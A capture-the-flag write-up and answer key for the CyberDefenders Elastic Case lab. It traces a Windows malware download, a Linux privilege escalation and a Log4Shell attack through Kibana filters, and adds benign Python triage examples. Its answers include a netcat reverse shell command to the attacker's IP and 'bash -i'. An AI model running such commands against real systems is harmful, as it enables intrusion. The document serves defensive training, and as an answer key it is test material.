Cyberdefenders ELASTIC CASE write-up
Cyberdefenders is a great resource for cyber security analysts. The platform has many different rooms for investigating cyber crimes. One of them is the Elastic Case room, which gives you a server with an ELK stack already deployed.
Let's dive into the ELK stack!
Download the c71-ElasticSecurity.zip file and extract it. With VirtualBox open, double-click the .ova file that comes out of the archive to import it, and the machine is ready.
Zip Password: cyberdefenders.org
SHA1: 0eda6605d309486110f012bc8dc73e4652059b04
Access Kibana interface via http://127.0.0.1:5601.
username: elastic
password: elastic
#1 Who downloads the malicious file which has a double extension?
The malicious file alerts are visible under Observability > Security > Overview. A double-extension file looks like orhan.xml.exe: a document-style extension followed by an executable one, so Windows runs it while the name still looks like a document.
Use this wildcard pattern to search for double-extension file names (it matches any name containing at least two dots, so expect some benign hits such as .tar.gz archives):
Filter: file.name : *.*.*
- Answer: ahmed
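The KQL search above casts a wide net. The following Python is an added example, not part of the original write-up or the challenge data: it reproduces the `*.*.*` wildcard as a regex and places a stricter double-extension check beside it, so you can see which hits the broad search returns that the stricter one drops. The sample file names and the extension lists are constructed for the example; only orhan.xml.exe and Account_details.pdf.exe come from the write-up.

```python
import re

# Constructed sample file names for the example. Only orhan.xml.exe and
# Account_details.pdf.exe are names quoted by the write-up; the rest are made up.
SAMPLE_FILE_NAMES = [
    "Account_details.pdf.exe",
    "orhan.xml.exe",
    "report.pdf",
    "backup.tar.gz",
    "invoice.docx.scr",
    "setup.exe",
]

# Extensions Windows executes on double-click, and extensions that make a name
# look like a harmless document. Both lists are assumptions for this example.
EXECUTABLE_EXTENSIONS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "hta", "msi"}
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "xml", "jpg", "png"}


def kql_wildcard_to_regex(pattern: str) -> re.Pattern:
    """Translate a KQL wildcard pattern (only '*' is special) into an anchored regex."""
    parts = [re.escape(p) for p in pattern.split("*")]
    return re.compile("^" + ".*".join(parts) + "$", re.IGNORECASE)


def matches_kql_wildcard(file_name: str, pattern: str = "*.*.*") -> bool:
    """The write-up's broad search: any name with at least two dots matches."""
    return kql_wildcard_to_regex(pattern).match(file_name) is not None


def is_double_extension_lure(file_name: str) -> bool:
    """Stricter check: a document-style extension immediately followed by an executable one."""
    parts = file_name.lower().split(".")
    if len(parts) < 3:
        return False
    penultimate, last = parts[-2], parts[-1]
    return last in EXECUTABLE_EXTENSIONS and penultimate in DOCUMENT_EXTENSIONS


def triage(file_names):
    """Return (wildcard_hits, lure_hits) so the two filters can be compared side by side."""
    wildcard_hits = [n for n in file_names if matches_kql_wildcard(n)]
    lure_hits = [n for n in file_names if is_double_extension_lure(n)]
    return wildcard_hits, lure_hits


if __name__ == "__main__":
    broad, strict = triage(SAMPLE_FILE_NAMES)
    print("KQL *.*.* matches:     ", broad)
    print("double-extension lures:", strict)
```

Run it and the broad list contains backup.tar.gz while the strict list does not; in Kibana the same narrowing is done by adding `and file.extension : (exe or scr or ...)` to the wildcard search.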
#2 What is the hostname he was using?
The same alert shows the hostname.
- Answer: DESKTOP-Q1SL9P2
#3 What is the name of the malicious file?
The same alert also includes the file name.
- Answer: Account_details.pdf.exe
#4 What is the attacker’s IP address?
- Answer: 192.168.1.10
#5 Another user with high privilege runs the same malicious file. What is the username?
The other username appears on the same alerts screen.
- Answer: cybery
#6 The attacker was able to upload a DLL file of size 8704. What is the file name?
Filter on the file size: file.size : 8704
- Answer: mCblHDgWP.dll
#7 What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?
- Answer: rundll32.exe
#8 The previous process was able to access a registry. What is the full path of the registry?
In Kibana Discover, on the logs index, filter with process.pid : 8856 (the pid of the rundll32.exe parent), then add the registry.path field from the selected fields to read the answer.
- Answer: HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
#9 PowerShell process with pid 8836 changed a file in the system. What was that filename?
Filter: process.name : "powershell.exe" and process.pid : 8836
- Answer: ModuleAnalysisCache
#10 PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?
Filter: process.pid: 11676 and file.extension : ps1
- Answer: __PSScriptPolicyTest_bymwxuft.3b5.ps1
#11 What is the machine’s IP address that is in the same LAN as a windows machine?
The Windows machine's IP is 192.168.10.10, so look for other hosts in the same /24 and exclude it:
Filter: host.ip: 192.168.10.0/24 and NOT host.ip: 192.168.10.10
- Answer: 192.168.10.30
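The CIDR filter above has document-level semantics in KQL: `host.ip : 192.168.10.0/24` matches a document if any of its host.ip values is in the range, and `NOT host.ip : 192.168.10.10` drops the whole document if any value equals that address. The Python below is an added example, not from the write-up, that reproduces exactly those semantics over constructed ECS-style host documents (host.ip is an array in ECS, so dual-homed hosts are covered too), and skips malformed values the way an ip-typed field would reject them at index time. The host names and addresses other than 192.168.10.10 and 192.168.10.30 are made up.

```python
import ipaddress

# Constructed ECS-style host documents for the example (not challenge data).
# ECS host.ip is an array because a host can carry several addresses.
SAMPLE_HOSTS = [
    {"host.name": "DESKTOP-Q1SL9P2", "host.ip": ["192.168.10.10", "fe80::1"]},
    {"host.name": "ubuntu", "host.ip": ["192.168.10.30"]},
    {"host.name": "CentOS", "host.ip": ["192.168.1.20"]},
    {"host.name": "dual-homed", "host.ip": ["10.0.0.5", "192.168.10.40"]},
    {"host.name": "also-has-excluded-ip", "host.ip": ["192.168.10.10", "192.168.10.50"]},
    {"host.name": "broken-record", "host.ip": ["not-an-ip"]},
]


def parse_addresses(raw_values):
    """Parse host.ip values, silently dropping anything that is not a valid address."""
    addrs = []
    for raw in raw_values:
        try:
            addrs.append(ipaddress.ip_address(raw))
        except ValueError:
            continue  # an ip-typed field would have rejected this value at index time
    return addrs


def matches_lan_filter(doc, network, excluded):
    """KQL semantics of `host.ip : <cidr> and NOT host.ip : <ip>` for one document:
    some value must fall inside the network, and no value may equal the excluded address."""
    addrs = parse_addresses(doc.get("host.ip", []))
    in_network = [a for a in addrs if a.version == network.version and a in network]
    return bool(in_network) and excluded not in addrs


def hosts_in_lan(docs, cidr: str, exclude_ip: str):
    """Return [(host.name, [in-range addresses])] for every document the filter keeps."""
    network = ipaddress.ip_network(cidr, strict=False)
    excluded = ipaddress.ip_address(exclude_ip)
    results = []
    for doc in docs:
        if matches_lan_filter(doc, network, excluded):
            lan_ips = sorted(a for a in parse_addresses(doc["host.ip"])
                             if a.version == network.version and a in network)
            results.append((doc["host.name"], [str(a) for a in lan_ips]))
    return results


if __name__ == "__main__":
    for name, ips in hosts_in_lan(SAMPLE_HOSTS, "192.168.10.0/24", "192.168.10.10"):
        print(f"{name}: {', '.join(ips)}")
```

Note that the host also-has-excluded-ip is dropped entirely even though 192.168.10.50 is in range; if you want per-address rather than per-document exclusion you need a runtime field or a script query, not a plain KQL NOT.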
#12 The attacker logged in to the Ubuntu machine after a brute-force attack. What username did he successfully log in with?
Check Security > Hosts > ubuntu > Authentications
- Answer: salem
#13 After that attacker downloaded the exploit from the GitHub repo using wget. What is the full URL of the repo?
Filter: hostname : "ubuntu" and process.args : "wget" and username : "salem"
#14 After the attacker runs the exploit, which spawns a new process called pkexec, what is the process's md5 hash?
Filter: host.name : "ubuntu" and process.executable : *pkexec and event.action : "uid_change"
- Answer: 3a4ad518e9e404a6bad3d39dfebaf2f6
#15 Then attacker gets an interactive shell by running a specific command on the process id 3011 with the root user. What is the command?
Filter: host.name : "ubuntu" and process.pid : 3011
- Answer: bash -i
#16 What is the hostname which alerts with signal.rule.name : "Netcat Network Activity"?
Filter: signal.rule.name : "Netcat Network Activity"
- Answer: CentOS
#17 What is the username who ran netcat?
Filter: process.args : “nc” and event.action : exec
- Answer: solr
#18 What is the parent process name of netcat?
Filter: process.args : “nc” and event.action : exec
- Answer: java
#19 If you focus on nc process, you can get the entire command that the attacker ran to get a reverse shell. Write the full command?
Filter: process.args : “nc” and event.action : exec
- Answer: nc -e /bin/bash 192.168.1.10 9999
#20 From the previous three questions, you may remember a famous java vulnerability. What is it?
Ez
- Answer: Log4Shell
#21 What is the entire log file path of the “solr” application?
Filter: log.file.path : *solr*
- Answer: /var/solr/logs/solr.log
#22 What is the path that is vulnerable to log4j?
Filter: log.file.path : *solr*
- Answer: /admin/cores
#23 What is the GET request parameter used to deliver log4j payload?
Filter: log.file.path : *solr*
- Answer: foo
#24 What is the JNDI payload that is connected to the LDAP port?
Filter: log.file.path : "/var/solr/logs/solr.log" and message : *jndi*